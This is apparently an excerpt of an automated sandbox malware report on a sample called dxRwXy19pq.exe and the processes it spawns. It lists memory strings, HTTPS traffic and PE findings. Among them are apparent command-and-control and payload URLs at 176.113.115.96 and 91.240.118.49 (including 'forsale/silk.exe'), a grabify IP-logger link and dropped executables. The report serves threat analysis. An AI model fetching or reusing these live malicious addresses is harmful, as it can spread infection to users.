            Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2472959823.00000000033FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae14615677411efa3231678fbb38f852a1cec7a86d87bdb6546ad12dac0290
            Source: photorecoverylib59.exe, 0000000E.00000002.2472959823.00000000033FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae14615677411efa3231678fbb38f862a1cec7a86d87bdb6546ad12dac0290
            Source: photorecoverylib59.exe, 0000000E.00000002.2472959823.00000000033FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae14615677411efa3231678fbb38f872a1cec7a86d87bdb6546ad12dac0290
            Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae14615677411efa3231678fbb38f926d19fe6595cd66946851e91fcd85241
            Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/en-GB
            Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/en-US
            Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/priseCertificates
            Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/rosoft
            Source: dxRwXy19pq.exe, 00000000.00000002.1330110847.00000000009E9000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325826877.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325685373.00000000009E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/
            Source: dxRwXy19pq.exe, 00000000.00000002.1330110847.00000000009E9000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325826877.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325685373.00000000009E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/Fy
            Source: dxRwXy19pq.exe, 00000000.00000003.1325685373.00000000009C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/forsale/silk.exe
            Source: dxRwXy19pq.exe, 00000000.00000003.1325515824.0000000000A16000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000002.1330305178.0000000000A21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/forsale/silk.exe/
            Source: dxRwXy19pq.exe, 00000000.00000003.1325515824.0000000000A62000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000002.1330305178.0000000000A62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/forsale/silk.exeLMEMP
            Source: dxRwXy19pq.exe, 00000000.00000002.1329906446.000000000099B000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325685373.000000000099A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/forsale/silk.exeTTC:
            Source: dxRwXy19pq.exe, 00000000.00000002.1330110847.00000000009E9000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325826877.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325685373.00000000009E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/forsale/silk.exeb
            Source: dxRwXy19pq.exe, 00000000.00000003.1325515824.0000000000A16000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000002.1330305178.0000000000A21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/forsale/silk.exel0
            Source: dxRwXy19pq.exe, 00000000.00000002.1330110847.00000000009E9000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325826877.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325685373.00000000009E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/forsale/silk.exeui
            Source: powershell.exe, 0000000A.00000002.1396249089.000002AE3A851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1408831814.0000027844361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
            Source: powershell.exe, 0000000F.00000002.1529410239.00000278543D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000F.00000002.1529410239.00000278543D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000F.00000002.1529410239.00000278543D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: vbc.exe, 00000005.00000002.1371160311.000000014007F000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
            Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
            Source: svchost.exe, 00000003.00000002.1403687928.000001F079263000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402159867.000001F07925A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1403780116.000001F079281000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
            Source: svchost.exe, 00000003.00000002.1403780116.000001F079281000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
            Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
            Source: svchost.exe, 00000003.00000002.1403724935.000001F079268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1400969047.000001F079267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
            Source: svchost.exe, 00000003.00000003.1400334415.000001F079286000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1403811178.000001F079288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
            Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
            Source: svchost.exe, 00000003.00000002.1403465472.000001F07923F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1401007403.000001F079262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1403687928.000001F079263000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402159867.000001F07925A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
            Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
            Source: svchost.exe, 00000003.00000002.1403359134.000001F07922B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1403724935.000001F079268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1400969047.000001F079267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
            Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
            Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
            Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
            Source: svchost.exe, 00000003.00000002.1403465472.000001F07923F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1401007403.000001F079262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1403687928.000001F079263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
            Source: svchost.exe, 00000003.00000002.1403523618.000001F079242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402364573.000001F079241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
            Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
            Source: svchost.exe, 00000003.00000003.1401007403.000001F079262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1403687928.000001F079263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
            Source: svchost.exe, 00000003.00000003.1400171496.000001F079233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
            Source: svchost.exe, 00000003.00000003.1402364573.000001F079241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
            Source: svchost.exe, 00000003.00000003.1401007403.000001F079262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1403687928.000001F079263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
            Source: svchost.exe, 00000003.00000002.1403523618.000001F079242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402364573.000001F079241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
            Source: svchost.exe, 00000003.00000003.1400171496.000001F079233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
            Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
            Source: svchost.exe, 00000003.00000003.1400171496.000001F079233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
            Source: svchost.exe, 00000003.00000002.1403359134.000001F07922B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1403724935.000001F079268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1400969047.000001F079267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
            Source: powershell.exe, 0000000F.00000002.1408831814.0000027844588000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: vbc.exe, 00000005.00000002.1380095836.000001798DB52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/64F2HH
            Source: dxRwXy19pq.exe, 00000000.00000003.1251221468.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000002.1330110847.00000000009E9000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325826877.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325685373.00000000009E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: powershell.exe, 0000000A.00000002.1483393077.000002AE4A8C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1529410239.00000278543D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: svchost.exe, 00000003.00000003.1400171496.000001F079233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic
            Source: svchost.exe, 00000003.00000003.1400171496.000001F079233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.v
            Source: svchost.exe, 00000003.00000003.1402364573.000001F079241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
            Source: svchost.exe, 00000003.00000003.1400171496.000001F079233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs
            Source: svchost.exe, 00000003.00000003.1402280721.000001F079249000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1403523618.000001F079242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402364573.000001F079241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1400171496.000001F079233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
            Source: svchost.exe, 00000003.00000003.1400171496.000001F079233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
            Source: svchost.exe, 00000003.00000003.1401744037.000001F07925D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
            Source: svchost.exe, 00000003.00000002.1403359134.000001F07922B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
            Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
            Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
            Source: 873bfcef-4c55-422e-88ba-1a31e36a0f58.exe, 0000000C.00000003.1329115344.0000000002191000.00000004.00001000.00020000.00000000.sdmp, 873bfcef-4c55-422e-88ba-1a31e36a0f58.exe, 0000000C.00000003.1329024764.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, 873bfcef-4c55-422e-88ba-1a31e36a0f58.exe, 0000000C.00000002.2471220408.0000000002191000.00000004.00001000.00020000.00000000.sdmp, 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, 0000000D.00000002.2471909885.0000000002138000.00000004.00001000.00020000.00000000.sdmp, 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, 0000000D.00000002.2471445888.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, 0000000D.00000003.1332398637.0000000002138000.00000004.00001000.00020000.00000000.sdmp, 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, 0000000D.00000003.1332221630.00000000030F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.easycutstudio.com/support.html
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownHTTPS traffic detected: 91.240.118.49:443 -> 192.168.2.6:49687 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49724 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49725 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49727 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49736 version: TLS 1.2

            System Summary

            barindex
            PE file contains section with special chars
            Source: dxRwXy19pq.exeStatic PE information: section name: "YR
            PE file has a writeable .text section
            Source: photorecoverylib59.exe.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: PhotoRecoveryLib.exe.14.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeCode function: 2_2_00007FF88B4C5716 NtUnmapViewOfSection,2_2_00007FF88B4C5716
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0042F594 NtdllDefWindowProc_A,13_2_0042F594
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00423B94 NtdllDefWindowProc_A,13_2_00423B94
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004125E8 NtdllDefWindowProc_A,13_2_004125E8
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00479380 NtdllDefWindowProc_A,13_2_00479380
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0045763C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,13_2_0045763C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0042E944: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,13_2_0042E944
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeCode function: 12_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,12_2_00409448
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0045568C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,13_2_0045568C
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeFile created: C:\Windows\Temp\VzUtW_3288.sysJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeFile deleted: C:\Windows\Temp\VzUtW_3288.sysJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_004037AC0_2_004037AC
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_004049700_2_00404970
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_004059E70_2_004059E7
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_0042AA300_2_0042AA30
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_00411AC00_2_00411AC0
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_0042B3700_2_0042B370
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_00484B700_2_00484B70
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_004154E00_2_004154E0
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_004195700_2_00419570
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_00420D700_2_00420D70
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_00482DE00_2_00482DE0
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_004016E00_2_004016E0
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_00401E800_2_00401E80
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_004227600_2_00422760
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeCode function: 2_2_00007FF88B4C52852_2_00007FF88B4C5285
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeCode function: 2_2_00007FF88B4C16A52_2_00007FF88B4C16A5
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeCode function: 12_2_0040840C12_2_0040840C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00470C7413_2_00470C74
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0043533C13_2_0043533C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004813C413_2_004813C4
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0046784813_2_00467848
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004303D013_2_004303D0
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0044453C13_2_0044453C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004885E013_2_004885E0
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0043463813_2_00434638
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00444AE413_2_00444AE4
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0048ED0C13_2_0048ED0C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00430F5C13_2_00430F5C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0045F16C13_2_0045F16C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004451DC13_2_004451DC
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0045B21C13_2_0045B21C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004455E813_2_004455E8
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0048768013_2_00487680
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0046989C13_2_0046989C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00451A3013_2_00451A30
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0043DDC413_2_0043DDC4
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_0040100014_2_00401000
